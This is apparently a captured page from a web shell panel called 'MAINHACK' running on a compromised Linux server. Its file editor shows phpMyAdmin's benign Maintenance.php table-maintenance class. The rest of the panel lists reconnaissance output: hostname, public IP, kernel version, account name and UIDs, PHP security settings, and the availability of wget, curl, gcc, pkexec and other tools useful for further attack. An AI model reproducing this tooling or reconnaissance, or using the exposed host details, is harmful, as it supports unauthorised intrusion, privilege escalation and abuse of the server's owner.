[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Maintenance.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Table; use PhpMyAdmin\DatabaseInterface; use PhpMyAdmin\Dbal\DatabaseName; use PhpMyAdmin\Dbal\TableName; use PhpMyAdmin\Dbal\Warning; use PhpMyAdmin\Index; use PhpMyAdmin\Table\Maintenance\Message; use PhpMyAdmin\Util; use function __; use function implode; use function sprintf; final class Maintenance { /** @var DatabaseInterface */ private $dbi; public function __construct(DatabaseInterface $dbi) { $this->dbi = $dbi; } /** * @param TableName[] $tables * * @return array<int, array<string, Message[]>|string> * @psalm-return array{array<string, Message[]>, string} */ public function getAnalyzeTableRows(DatabaseName $db, array $tables): array { $backQuotedTables = []; foreach ($tables as $table) { $backQuotedTables[] = Util::backquote($table->getName()); } $query = 'ANALYZE TABLE ' . implode(', ', $backQuotedTables) . ';'; $this->dbi->selectDb($db); /** @var array<int, array<string, string>> $result */ $result = $this->dbi->fetchResult($query); $rows = []; foreach ($result as $row) { $message = Message::fromArray($row); $rows[$message->table][] = $message; } return [$rows, $query]; } /** * @param TableName[] $tables * * @return array<int, array<string, Message[]>|string> * @psalm-return array{array<string, Message[]>, string} */ public function getCheckTableRows(DatabaseName $db, array $tables): array { $backQuotedTables = []; foreach ($tables as $table) { $backQuotedTables[] = Util::backquote($table->getName()); } $query = 'CHECK TABLE ' . implode(', ', $backQuotedTables) . ';'; $this->dbi->selectDb($db); /** @var array<int, array<string, string>> $result */ $result = $this->dbi->fetchResult($query); $rows = []; foreach ($result as $row) { $message = Message::fromArray($row); $rows[$message->table][] = $message; } return [$rows, $query]; } /** * @param TableName[] $tables * * @return array<int, array<string, array<int, array<string, string|null>>>|string> * @psalm-return array{array<int, array<string, string|null>>, string, Warning[]} */ public function getChecksumTableRows(DatabaseName $db, array $tables): array { $backQuotedTables = []; foreach ($tables as $table) { $backQuotedTables[] = Util::backquote($table->getName()); } $query = 'CHECKSUM TABLE ' . implode(', ', $backQuotedTables) . ';'; $this->dbi->selectDb($db); /** @var array<int, array<string, string|null>> $rows */ $rows = $this->dbi->fetchResult($query); $warnings = $this->dbi->getWarnings(); return [$rows, $query, $warnings]; } /** * @param TableName[] $tables */ public function getIndexesProblems(DatabaseName $db, array $tables): string { $indexesProblems = ''; foreach ($tables as $table) { $check = Index::findDuplicates($table->getName(), $db->getName()); if (empty($check)) { continue; } $indexesProblems .= sprintf(__('Problems with indexes of table `%s`'), $table->getName()); $indexesProblems .= $check; } return $indexesProblems; } /** * @param TableName[] $tables * * @return array<int, array<string, Message[]>|string> * @psalm-return array{array<string, Message[]>, string} */ public function getOptimizeTableRows(DatabaseName $db, array $tables): array { $backQuotedTables = []; foreach ($tables as $table) { $backQuotedTables[] = Util::backquote($table->getName()); } $query = 'OPTIMIZE TABLE ' . implode(', ', $backQuotedTables) . ';'; $this->dbi->selectDb($db); /** @var array<int, array<string, string>> $result */ $result = $this->dbi->fetchResult($query); $rows = []; foreach ($result as $row) { $message = Message::fromArray($row); $rows[$message->table][] = $message; } return [$rows, $query]; } /** * @param TableName[] $tables * * @return array<int, array<string, Message[]>|string> * @psalm-return array{array<string, Message[]>, string} */ public function getRepairTableRows(DatabaseName $db, array $tables): array { $backQuotedTables = []; foreach ($tables as $table) { $backQuotedTables[] = Util::backquote($table->getName()); } $query = 'REPAIR TABLE ' . implode(', ', $backQuotedTables) . ';'; $this->dbi->selectDb($db); /** @var array<int, array<string, string>> $result */ $result = $this->dbi->fetchResult($query); $rows = []; foreach ($result as $row) { $message = Message::fromArray($row); $rows[$message->table][] = $message; } return [$rows, $query]; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002